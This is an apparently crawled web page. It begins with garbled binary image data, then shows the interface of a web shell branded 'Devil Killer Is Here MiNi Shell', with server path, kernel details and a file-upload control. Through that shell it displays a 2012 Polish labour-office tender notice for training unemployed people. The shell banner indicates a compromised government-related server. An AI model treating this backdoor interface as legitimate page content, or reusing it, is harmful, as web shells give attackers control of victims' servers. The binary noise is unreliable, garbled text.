JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120821/307364-N-2012.html

<p class="kh_header"><b>Toruń: SZKOLENIA GRUPOWE OSÓB BEZROBOTNYCH</b><br>
<b>Numer ogłoszenia: 307364 - 2012; data zamieszczenia: 21.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy dla Miasta Torunia , ul. Mazowiecka 49A, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 6580202, faks 56 6580201.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SZKOLENIA GRUPOWE OSÓB BEZROBOTNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi szkolenia polegające na zorganizowaniu i przeprowadzeniu kursów dla  osób bezrobotnych uczestniczących w projektach: JESTEŚMY AKTYWNI - DZIAŁAMY  oraz PRZEDSIĘBIORCZOŚĆ SZANSĄ NA ROZWÓJ REGIONU KUJAWSKO-POMORSKIEGO współfinansowanych przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. W przypadku wolnych miejsc mogą być kierowane osoby w ramach środków Funduszu Pracy. Zamówienie składa się z 5 części. 
1.Kierowca-operator wózków jezdniowych z elementami gospodarki magazynowej - 8 osób -1 grupa.
2.Spawanie blach i rur spoinami pachwinowymi metodą MAG - 7 osób -1 grupa.
3.Pracownik ds. kadrowo-płacowych z obsługą programu SYMFONIA i PŁATNIK - 8 osób - 1 grupa.
4.Fakturzysta z obsługa kas fiskalnych - 7 osób - 1 grupa.
5. ABC przedsiębiorczości - 121 osób - 11-15 grup..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że:
- jest instytucją szkoleniową w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity: Dz. U. z 2008 r. Nr 69, poz. 415 z późn. zm.), tj. posiada wpis do rejestru instytucji szkoleniowych na 2012 rok.
Ocena spełniania ww. warunku dokonana będzie przez Zamawiającego poprzez weryfikację wpisu do RIS w elektronicznej bazie danych prowadzonej przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej. Warunek zostanie uznany za spełniony, jeżeli instytucja szkoleniowa będzie figurowała w Rejestrze Instytucji Szkoleniowych jako instytucja aktywna w roku 2012,
- spełnia wymagania do prowadzenia szkoleń i egzaminów spawaczy w metodzie MAG-135 - dotyczy części 2 zamówienia.
Warunek zostanie uznany za spełniony, jeżeli instytucja szkoleniowa posiada ważny co najmniej na okres trwania szkolenia atest/certyfikat na prowadzenie szkoleń i egzaminów spawaczy w metodzie MAG-135, uzyskany na podstawie wymagań instytucji podległych Ministrowi Gospodarki lub innemu właściwemu.
Ocena spełniania warunku dokonana będzie przez Zamawiającego wg formuły spełnia-nie spełnia na podstawie oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał:
a)w części 1 zamówienia:
   -  co najmniej jeden kursy kierowcy-operatora wózków jezdniowych dla minimum 8 osób , oraz 
   -  co najmniej jeden kurs w zakresie gospodarki magazynowej dla minimum 8 osób.
	Dopuszcza się również możliwość realizacji jednego kursu dla min.8 osób, który obejmuje oba wymagane bloki tematyczne.
b)  w części 2 zamówienia: 
        -  co najmniej 1 kurs w zakresie spawania metodą MAG dla minimum 7 osób.
c) w części 3 zamówienia:
     -  co najmniej jeden kurs w zakresie kadr i płac dla minimum 8 osób z liczbą godzin zajęć co najmniej 120.
d) w części 4 zamówienia: 
     - co najmniej 1 kurs z zakresu fakturowania, obsługi kas fiskalnych lub sprzedaży dla minimum 7 osób z liczbą godzin zajęć minimum 60,
e) w części 5 zamówienia:
     - co najmniej 10 kursów z zakresu przedsiębiorczości dla minimum 10 osób każdy z liczbą godzin zajęć minimum 40.
Ocena spełniania  warunku dokonana będzie przez Zamawiającego wg formuły spełnia-nie spełnia na podstawie oświadczenia i zał. nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia będzie dysponował:
a) potencjałem technicznym:
- pomieszczenia umożliwiające realizację zajęć teoretycznych dostosowane do potrzeb danego szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia - w szczególności co najmniej 1 sali szkoleniowej (a w części 5 zamówienia - 3 sal) dostosowanej/ych do ilości osób szkolonych z odpowiednią ilością miejsc i stolików, oświetleniem, ogrzewaniem i wentylacją,
- wyposażenie dydaktyczne i urządzenia techniczne umożliwiające realizację zajęć teoretycznych danego szkolenia tzn. flipchart lub tablica magnetyczna (klasyczna), sprzęt audiowizualny,
- pomieszczenia lub plac, które umożliwią realizację zajęć praktycznych danego szkolenia dostosowane do potrzeb danego szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia,
- wyposażenie, maszyny lub urządzenia techniczne umożliwiające realizację zajęć praktycznych danego szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków  pracy przy ich eksploatacji.
Ocena spełniania warunku dokonana będzie przez Zamawiającego wg formuły spełnia-nie spełnia na podstawie oświadczenia i zał. nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia będzie dysponował:
- w części 1-4 zamówienia - co najmniej 2 wykładowcami/instruktorami. Każdy z wykładowców/instruktorów musi posiadać doświadczenie zawodowe w postaci przeprowadzonych w okresie ostatnich 3 lat co najmniej 3 zajęć z bloku tematycznego, który będzie realizować na kursie,
- w części 5 zamówienia - co najmniej 3 trenerów/wykładowców (z uwagi na jednoczesną realizację 3 kursów). Każdy z trenerów musi posiadać wykształcenie wyższe i doświadczenie zawodowe w postaci przeprowadzonych w okresie ostatnich 3 lat co najmniej 3 szkoleń z zakresu przedsiębiorczości.
Ocena spełniania warunku dokonana będzie przez Zamawiającego wg formuły spełnia-nie spełnia na podstawie oświadczenia i zał. nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełniania warunku dokonana będzie przez Zamawiającego wg formuły spełnia-nie spełnia na podstawie oświadczenia Wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)   Program szkolenia (wzór - zał. nr 6 do SIWZ),
b)   Kalkulacja ceny szkolenia  (wzór - zał. nr 7 do SIWZ- do części 1-4, zał. nr 7a do SIWZ - do części 5),
c)   Wykaz planowanych miejsc odbywania zajęć praktycznych na kursie - dot. części 3 zamówienia (wzór - zał. nr 13 do SIWZ),  
d) Wzory zaświadczeń/certyfikatów, świadectw kwalifikacyjnych potwierdzających ukończenie szkolenia i nabycie kwalifikacji,
e)   Certyfikaty jakości usług  (o ile Wykonawca je posiada) wydane przez instytucje do tego uprawnione  (przy ocenie brany jest pod uwagę certyfikat systemu zarządzania jakością ISO, akredytacja kuratora oświaty), 
f) Pełnomocnictwo, gdy Wykonawcę reprezentuje pełnomocnik,
g) Pełnomocnictwo, w przypadku podmiotów występujących wspólnie, do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia (jeśli dotyczy).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. zmiany terminu realizacji szkolenia - na uzasadniony wniosek Wykonawcy za zgodą Zamawiającego lub na wniosek Zamawiającego w uzgodnieniu z Wykonawcą,
2. zmiany w kadrze dydaktycznej, gdy konieczność jej dokonania wynika ze zdarzeń, których nie można było przewidzieć w dniu zawarcia umowy (np. choroba, śmierć itp.).  W przypadku zmiany wykładowcy wykonawca zobowiązany jest zapewnić, aby nowy wykładowca posiadał co najmniej kwalifikacje, wykształcenie i doświadczenie osoby, która została wykazana w wykazie kadry dydaktycznej - zał. nr 5 do SIWZ, na podstawie którego dokonano wyboru wykonawcy,
3. zmiany miejsca realizacji zajęć, gdy konieczność jej dokonania wynika z przyczyn, których nie można było przewidzieć w dniu zawarcia umowy. Zmiana ta nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych określonych w SIWZ,
4. zmiany harmonogramu zajęć i innej dokumentacji szkolenia, gdy konieczność jej dokonania wynika z przyczyn, których nie można było przewidzieć w dniu zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy dla Miasta Torunia
adres:  87-100 Toruń, ul. Mazowiecka 49A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.08.2012 godzina 14:00, miejsce: Powiatowy Urząd Pracy dla Miasta Torunia
adres:  87-100 Toruń, ul. Mazowiecka 49A
kancelaria (pok.42 - II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekty: Jesteśmy aktywni działamy -  Przedsiębiorczość szansą na rozwój regionu kujawsko-pomorskiego,  współfinansowane przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kierowca-operator wózków jezdniowych z elementami gospodarki magazynowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cel szkolenia: uzyskanie uprawnień UDT do kierowania wózkami jezdniowymi (wszystkie typy) wraz z bezpieczną wymianą butli, zapoznanie się z podstawami gospodarki magazynowej
2. Ilość godzin zajęć dydaktycznych: 100, w tym:  blok wózków jezdniowych z bezpieczna wymiana butli gazowych - 82 godz., gospodarka magazynowa - 18 godz. oraz godziny przeznaczone na egzamin końcowy.
3. W zakresie obsługi wózków jezdniowych wymagana ilość godzin zajęć praktycznych - 30.
4. Liczba uczestników - 8. Nie dopuszcza się możliwości zwiększenia grupy szkoleniowej przez wykonawcę.
5. Pożądany termin rozpoczęcia i zakończenia szkolenia: październik 2012.
6. Czas trwania kursu:  maksymalnie 20 dni kalendarzowych.
7.W zakresie obsługi wózków jezdniowych szkolenie powinno być przeprowadzone w oparciu o program szkolenia opracowany przez Urząd Dozoru Technicznego (lub były Ośrodek Doskonalenia Kadr w Mysłowicach) albo Instytut Mechanizacji Budownictwa i Górnictwa Skalnego.  Ponadto program musi być realizowany w szczególności zgodnie z rozporządzeniem Ministra Gospodarki z 10.05.2002 w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz.U. z 2002 r. Nr 70 poz.650 z późn.zm.).
8. W zakresie bloku magazynowego program powinien obejmować podstawowe zagadnienia gospodarki magazynowej, w tym obieg dokumentów magazynowych.
9.Szkolenie w zakresie obsługi wózków jezdniowych kończy się egzaminem przeprowadzonym przez komisję UDT..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Dświadczenie Wykonawcy - 30</li>
<li>3. Posiadanie certyfikatów jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Spawanie blach i rur spoinami pachwinowymi metodą MAG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Celem szkolenia jest uzyskanie uprawnień spawalniczych w zakresie spawania blach i rur spoinami pachwinowymi metodą MAG-135.
2. Baza szkoleniowa do przeprowadzenia zajęć znajdująca się na terenie Miasta Torunia w szczególności musi być zgodna
- z wymaganiami instytucji uprawnionych do wydawania atestów/certyfikatów  na prowadzenie szkoleń i egzaminów spawaczy, uzyskanych na podstawie wymagań instytucji podległych Ministrowi Gospodarki lub innemu właściwemu,
- z Rozporządzeniem Ministra Gospodarki z 27.04.2000 w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz.U. z 2000 r., Nr 40, poz.470).
3. Liczba osób do przeszkolenia: 7 (jedna grupa). Nie dopuszcza się możliwości zwiększenia grupy szkoleniowej przez wykonawcę. 
4. Forma organizacji szkolenia: kurs.
5. Pożądany termin szkolenia  -   1 - 30.10.2012.
6. Czas trwania kursu: maksymalnie 30 dni kalendarzowych.
7. Wymagana ilość godzin zajęć dydaktycznych  - maksymalnie 150. Godzina zegarowa zajęć teoretycznych liczy 45 minut zajęć i 15 minut przerwy, a godzina zegarowa zajęć praktycznych liczy 60 minut, przy czym długość przerw może być ustalana elastycznie. Dzień zajęć nie może kończyć się przerwą..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie Wykonawcy - 30</li>
<li>3. Posiadanie certyfikatów jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pracownik ds. kadrowo-płacowych z obsługą programu SYMFONIA i PŁATNIK.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cel szkolenia:  praktyczne przygotowanie  do pracy w charakterze pracownika ds. kadr i płac.
2. Liczba osób do przeszkolenia: 8 osób (jedna grupa). Nie dopuszcza się możliwości zwiększenia grupy szkoleniowej przez wykonawcę.
3. Forma organizacji szkolenia: kurs.
4. Pożądany termin szkolenia:  1.10.2012 - 30.11.2012.
5. Wymagana ilość godzin zajęć dydaktycznych - 320, w tym 4-tygodniowe zajęcia praktyczne (160 godzin tj. 8 godzin dziennie) w zakładzie pracy. Godzina zegarowa zajęć liczy 45 minut zajęć i 15 minut przerwy, przy czym długość przerw może być ustalana elastycznie. Dzień zajęć nie może kończyć się przerwą. Godzina zegarowa zajęć praktycznych wynosi 60 min. 
6. Zajęcia praktyczne powinny odbywać się w komórkach kadrowo-płacowych zakładów pracy na terenie Torunia zatrudniających co najmniej 5 pracowników. Wykonawca w zał. nr 13 do SIWZ musi wskazać co najmniej 5 firm, z którymi wstępnie uzgodnił przeprowadzenie zajęć praktycznych. Porozumienia/umowy z zakładami pracy dot. możliwości odbywania 4-tygodniowych zajęć praktycznych w komórkach kadrowo-płacowych trzeba będzie przedłożyć wraz z harmonogramem zajęć przed zawarciem umowy. 
7. Wymagany zakres tematyczny szkolenia:
- elementy prawa pracy -  12 godz.
- dokumentacja pracownicza - 12 godz.
- płace - sposoby rozliczeń z pracownikami, listy płac, rozliczenia z ZUS i PIT - 40 godz.
- wynagrodzenia za czas nieobecności w pracy, zasiłki z ubezpieczenia chorobowego - 24 godz.,
- kadry i płace w ujęciu informatycznym - program Symfonia - 48 godz.,
- obsługa programu Płatnik - 24 godz.
- zajęcia praktyczne - 160 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie Wykonawcy - 30</li>
<li>3. Posiadanie certyfikatów jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Fakturzysta z obsługą kas fiskalnych.</p>
